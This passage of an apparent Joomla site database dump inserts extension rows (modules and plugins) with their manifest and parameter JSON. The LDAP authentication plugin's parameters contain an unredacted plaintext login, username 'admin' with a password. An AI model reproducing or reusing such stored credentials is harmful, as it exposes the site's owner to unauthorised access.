(316, 0, 'mod_tags_popular', 'module', 'mod_tags_popular', '', 0, 1, 1, 0, '{\"name\":\"mod_tags_popular\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_tags_popular\"}', '{\"maximum\":\"5\",\"timeframe\":\"alltime\",\"owncache\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(317, 0, 'mod_tags_similar', 'module', 'mod_tags_similar', '', 0, 1, 1, 0, '{\"name\":\"mod_tags_similar\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_SIMILAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_tags_similar\"}', '{\"maximum\":\"5\",\"matchtype\":\"any\",\"owncache\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(318, 0, 'mod_sampledata', 'module', 'mod_sampledata', '', 1, 1, 1, 0, '{\"name\":\"mod_sampledata\",\"type\":\"module\",\"creationDate\":\"July 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8.0\",\"description\":\"MOD_SAMPLEDATA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_sampledata\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(319, 0, 'mod_latestactions', 'module', 'mod_latestactions', '', 1, 1, 1, 0, '{\"name\":\"mod_latestactions\",\"type\":\"module\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"MOD_LATESTACTIONS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_latestactions\"}', '{}', '', '', 0, '1970-01-01 00:00:00', 0, 0),
(320, 0, 'mod_privacy_dashboard', 'module', 'mod_privacy_dashboard', '', 1, 1, 1, 0, '{\"name\":\"mod_privacy_dashboard\",\"type\":\"module\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"MOD_PRIVACY_DASHBOARD_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_privacy_dashboard\"}', '{}', '', '', 0, '1970-01-01 00:00:00', 0, 0),
(400, 0, 'plg_authentication_gmail', 'plugin', 'gmail', 'authentication', 0, 0, 1, 0, '{\"name\":\"plg_authentication_gmail\",\"type\":\"plugin\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_GMAIL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"gmail\"}', '{\"applysuffix\":\"0\",\"suffix\":\"\",\"verifypeer\":\"1\",\"user_blacklist\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 1, 0),
(401, 0, 'plg_authentication_joomla', 'plugin', 'joomla', 'authentication', 0, 1, 1, 1, '{\"name\":\"plg_authentication_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(402, 0, 'plg_authentication_ldap', 'plugin', 'ldap', 'authentication', 0, 0, 1, 0, '{\"name\":\"plg_authentication_ldap\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LDAP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"ldap\"}', '{\"host\":\"\",\"port\":\"389\",\"use_ldapV3\":\"0\",\"negotiate_tls\":\"0\",\"no_referrals\":\"0\",\"auth_method\":\"bind\",\"base_dn\":\"\",\"search_string\":\"\",\"users_dn\":\"\",\"username\":\"admin\",\"password\":\"bobby7\",\"ldap_fullname\":\"fullName\",\"ldap_email\":\"mail\",\"ldap_uid\":\"uid\"}', '', '', 0, '0000-00-00 00:00:00', 3, 0);
INSERT INTO `y57u5_extensions` (`extension_id`, `package_id`, `name`, `type`, `element`, `folder`, `client_id`, `enabled`, `access`, `protected`, `manifest_cache`, `params`, `custom_data`, `system_data`, `checked_out`, `checked_out_time`, `ordering`, `state`) VALUES
(403, 0, 'plg_content_contact', 'plugin', 'contact', 'content', 0, 1, 1, 0, '{\"name\":\"plg_content_contact\",\"type\":\"plugin\",\"creationDate\":\"January 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.2\",\"description\":\"PLG_CONTENT_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}', '', '', '', 0, '0000-00-00 00:00:00', 1, 0),
(404, 0, 'plg_content_emailcloak', 'plugin', 'emailcloak', 'content', 0, 1, 1, 0, '{\"name\":\"plg_content_emailcloak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_EMAILCLOAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"emailcloak\"}', '{\"mode\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 1, 0),
(405, 0, 'plg_content_geshi', 'plugin', 'geshi', 'content', 0, 0, 1, 0, '{\"legacy\":false,\"name\":\"plg_content_geshi\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"qbnz.com\\/highlighter\",\"version\":\"2.5.0\",\"description\":\"PLG_CONTENT_GESHI_XML_DESCRIPTION\",\"group\":\"\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 2, 0),
(406, 0, 'plg_content_loadmodule', 'plugin', 'loadmodule', 'content', 0, 1, 1, 0, '{\"name\":\"plg_content_loadmodule\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOADMODULE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"loadmodule\"}', '{\"style\":\"none\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(407, 0, 'plg_content_pagebreak', 'plugin', 'pagebreak', 'content', 0, 1, 1, 0, '{\"name\":\"plg_content_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagebreak\"}', '{\"title\":\"1\",\"article_index\":\"1\",\"article_index_text\":\"\",\"multipage_toc\":\"1\",\"showall\":\"1\",\"style\":\"pages\"}', '', '', 0, '0000-00-00 00:00:00', 4, 0),
(408, 0, 'plg_content_pagenavigation', 'plugin', 'pagenavigation', 'content', 0, 0, 1, 0, '{\"name\":\"plg_content_pagenavigation\",\"type\":\"plugin\",\"creationDate\":\"January 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_PAGENAVIGATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagenavigation\"}', '{\"position\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 5, 0),
(409, 0, 'plg_content_vote', 'plugin', 'vote', 'content', 0, 1, 1, 0, '{\"name\":\"plg_content_vote\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_VOTE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"vote\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 6, 0),
(410, 0, 'plg_editors_codemirror', 'plugin', 'codemirror', 'editors', 0, 1, 1, 1, '{\"name\":\"plg_editors_codemirror\",\"type\":\"plugin\",\"creationDate\":\"28 March 2011\",\"author\":\"Marijn Haverbeke\",\"copyright\":\"Copyright (C) 2014 - 2017 by Marijn Haverbeke <marijnh@gmail.com> and others\",\"authorEmail\":\"marijnh@gmail.com\",\"authorUrl\":\"http:\\/\\/codemirror.net\\/\",\"version\":\"5.40.0\",\"description\":\"PLG_CODEMIRROR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"codemirror\"}', '{\"lineNumbers\":\"1\",\"lineWrapping\":\"1\",\"matchTags\":\"1\",\"matchBrackets\":\"1\",\"marker-gutter\":\"1\",\"autoCloseTags\":\"1\",\"autoCloseBrackets\":\"1\",\"autoFocus\":\"1\",\"theme\":\"default\",\"tabmode\":\"indent\"}', '', '', 0, '0000-00-00 00:00:00', 1, 0),
(411, 0, 'plg_editors_none', 'plugin', 'none', 'editors', 0, 1, 1, 1, '{\"name\":\"plg_editors_none\",\"type\":\"plugin\",\"creationDate\":\"September 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_NONE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"none\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 2, 0),
(412, 0, 'plg_editors_tinymce', 'plugin', 'tinymce', 'editors', 0, 1, 1, 0, '{\"name\":\"plg_editors_tinymce\",\"type\":\"plugin\",\"creationDate\":\"2005-2019\",\"author\":\"Tiny Technologies, Inc\",\"copyright\":\"Tiny Technologies, Inc\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"https:\\/\\/www.tiny.cloud\",\"version\":\"4.5.11\",\"description\":\"PLG_TINY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tinymce\"}', '{\"mode\":\"1\",\"skin\":\"0\",\"mobile\":\"0\",\"entity_encoding\":\"raw\",\"lang_mode\":\"0\",\"text_direction\":\"ltr\",\"content_css\":\"1\",\"content_css_custom\":\"\",\"relative_urls\":\"1\",\"newlines\":\"0\",\"invalid_elements\":\"script,applet,iframe\",\"valid_elements\":\"\",\"extended_elements\":\",@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight],@[data-lightbox],@[data-spotlight]\",\"html_height\":\"550\",\"html_width\":\"750\",\"resizing\":\"1\",\"element_path\":\"1\",\"fonts\":\"1\",\"paste\":\"1\",\"searchreplace\":\"1\",\"insertdate\":\"1\",\"colors\":\"1\",\"table\":\"1\",\"smilies\":\"1\",\"hr\":\"1\",\"link\":\"1\",\"media\":\"1\",\"print\":\"1\",\"directionality\":\"1\",\"fullscreen\":\"1\",\"alignment\":\"1\",\"visualchars\":\"1\",\"visualblocks\":\"1\",\"nonbreaking\":\"1\",\"template\":\"1\",\"blockquote\":\"1\",\"wordcount\":\"1\",\"image_advtab\":\"1\",\"advlist\":\"1\",\"autosave\":\"1\",\"contextmenu\":\"1\",\"inlinepopups\":\"1\",\"custom_plugin\":\"\",\"custom_button\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 3, 0),
(413, 0, 'plg_editors-xtd_article', 'plugin', 'article', 'editors-xtd', 0, 1, 1, 0, '{\"name\":\"plg_editors-xtd_article\",\"type\":\"plugin\",\"creationDate\":\"October 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_ARTICLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"article\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 1, 0),
(414, 0, 'plg_editors-xtd_image', 'plugin', 'image', 'editors-xtd', 0, 1, 1, 0, '{\"name\":\"plg_editors-xtd_image\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_IMAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"image\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 2, 0),
(415, 0, 'plg_editors-xtd_pagebreak', 'plugin', 'pagebreak', 'editors-xtd', 0, 1, 1, 0, '{\"name\":\"plg_editors-xtd_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EDITORSXTD_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagebreak\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 3, 0),
(416, 0, 'plg_editors-xtd_readmore', 'plugin', 'readmore', 'editors-xtd', 0, 1, 1, 0, '{\"name\":\"plg_editors-xtd_readmore\",\"type\":\"plugin\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_READMORE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"readmore\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 4, 0),
(417, 0, 'plg_search_categories', 'plugin', 'categories', 'search', 0, 1, 1, 0, '{\"name\":\"plg_search_categories\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"categories\"}', '{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(418, 0, 'plg_search_contacts', 'plugin', 'contacts', 'search', 0, 1, 1, 0, '{\"name\":\"plg_search_contacts\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTACTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contacts\"}', '{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(419, 0, 'plg_search_content', 'plugin', 'content', 'search', 0, 1, 1, 0, '{\"name\":\"plg_search_content\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}', '{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(420, 0, 'plg_search_newsfeeds', 'plugin', 'newsfeeds', 'search', 0, 1, 1, 0, '{\"name\":\"plg_search_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}', '{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(422, 0, 'plg_system_languagefilter', 'plugin', 'languagefilter', 'system', 0, 0, 1, 1, '{\"name\":\"plg_system_languagefilter\",\"type\":\"plugin\",\"creationDate\":\"July 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGEFILTER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"languagefilter\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 1, 0),
(423, 0, 'plg_system_p3p', 'plugin', 'p3p', 'system', 0, 1, 1, 0, '{\"name\":\"plg_system_p3p\",\"type\":\"plugin\",\"creationDate\":\"September 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_P3P_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"p3p\"}', '{\"headers\":\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"}', '', '', 0, '0000-00-00 00:00:00', 2, 0),
(424, 0, 'plg_system_cache', 'plugin', 'cache', 'system', 0, 0, 1, 1, '{\"name\":\"plg_system_cache\",\"type\":\"plugin\",\"creationDate\":\"February 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CACHE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"cache\"}', '{\"browsercache\":\"0\",\"cachetime\":\"15\"}', '', '', 0, '0000-00-00 00:00:00', 9, 0),
(425, 0, 'plg_system_debug', 'plugin', 'debug', 'system', 0, 1, 1, 0, '{\"name\":\"plg_system_debug\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_DEBUG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"debug\"}', '{\"profile\":\"1\",\"queries\":\"1\",\"memory\":\"1\",\"language_files\":\"1\",\"language_strings\":\"1\",\"strip-first\":\"1\",\"strip-prefix\":\"\",\"strip-suffix\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 4, 0),
(426, 0, 'plg_system_log', 'plugin', 'log', 'system', 0, 1, 1, 1, '{\"name\":\"plg_system_log\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"log\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 5, 0),
(427, 0, 'plg_system_redirect', 'plugin', 'redirect', 'system', 0, 1, 1, 1, '{\"name\":\"plg_system_redirect\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"redirect\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 6, 0),
(428, 0, 'plg_system_remember', 'plugin', 'remember', 'system', 0, 1, 1, 1, '{\"name\":\"plg_system_remember\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_REMEMBER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"remember\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 7, 0),
(429, 0, 'plg_system_sef', 'plugin', 'sef', 'system', 0, 1, 1, 0, '{\"name\":\"plg_system_sef\",\"type\":\"plugin\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEF_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sef\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 8, 0),
(430, 0, 'plg_system_logout', 'plugin', 'logout', 'system', 0, 1, 1, 1, '{\"name\":\"plg_system_logout\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LOGOUT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"logout\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 3, 0),
(431, 0, 'plg_user_contactcreator', 'plugin', 'contactcreator', 'user', 0, 0, 1, 0, '{\"name\":\"plg_user_contactcreator\",\"type\":\"plugin\",\"creationDate\":\"August 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTACTCREATOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contactcreator\"}', '{\"autowebpage\":\"\",\"category\":\"34\",\"autopublish\":\"0\"}', '', '', 0, '0000-00-00 00:00:00', 1, 0),
(432, 0, 'plg_user_joomla', 'plugin', 'joomla', 'user', 0, 1, 1, 0, '{\"name\":\"plg_user_joomla\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}', '{\"autoregister\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 2, 0),
(433, 0, 'plg_user_profile', 'plugin', 'profile', 'user', 0, 0, 1, 0, '{\"name\":\"plg_user_profile\",\"type\":\"plugin\",\"creationDate\":\"January 2008\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_PROFILE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"profile\"}', '{\"register-require_address1\":\"1\",\"register-require_address2\":\"1\",\"register-require_city\":\"1\",\"register-require_region\":\"1\",\"register-require_country\":\"1\",\"register-require_postal_code\":\"1\",\"register-require_phone\":\"1\",\"register-require_website\":\"1\",\"register-require_favoritebook\":\"1\",\"register-require_aboutme\":\"1\",\"register-require_tos\":\"0\",\"register_tos_article\":\"63\",\"register-require_dob\":\"1\",\"profile-require_address1\":\"1\",\"profile-require_address2\":\"1\",\"profile-require_city\":\"1\",\"profile-require_region\":\"1\",\"profile-require_country\":\"1\",\"profile-require_postal_code\":\"1\",\"profile-require_phone\":\"1\",\"profile-require_website\":\"1\",\"profile-require_favoritebook\":\"1\",\"profile-require_aboutme\":\"1\",\"profile-require_dob\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(434, 0, 'plg_extension_joomla', 'plugin', 'joomla', 'extension', 0, 1, 1, 1, '{\"name\":\"plg_extension_joomla\",\"type\":\"plugin\",\"creationDate\":\"May 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EXTENSION_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 1, 0),
(435, 0, 'plg_content_joomla', 'plugin', 'joomla', 'content', 0, 1, 1, 0, '{\"name\":\"plg_content_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(436, 0, 'plg_system_languagecode', 'plugin', 'languagecode', 'system', 0, 0, 1, 0, '{\"name\":\"plg_system_languagecode\",\"type\":\"plugin\",\"creationDate\":\"November 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGECODE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"languagecode\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 10, 0),
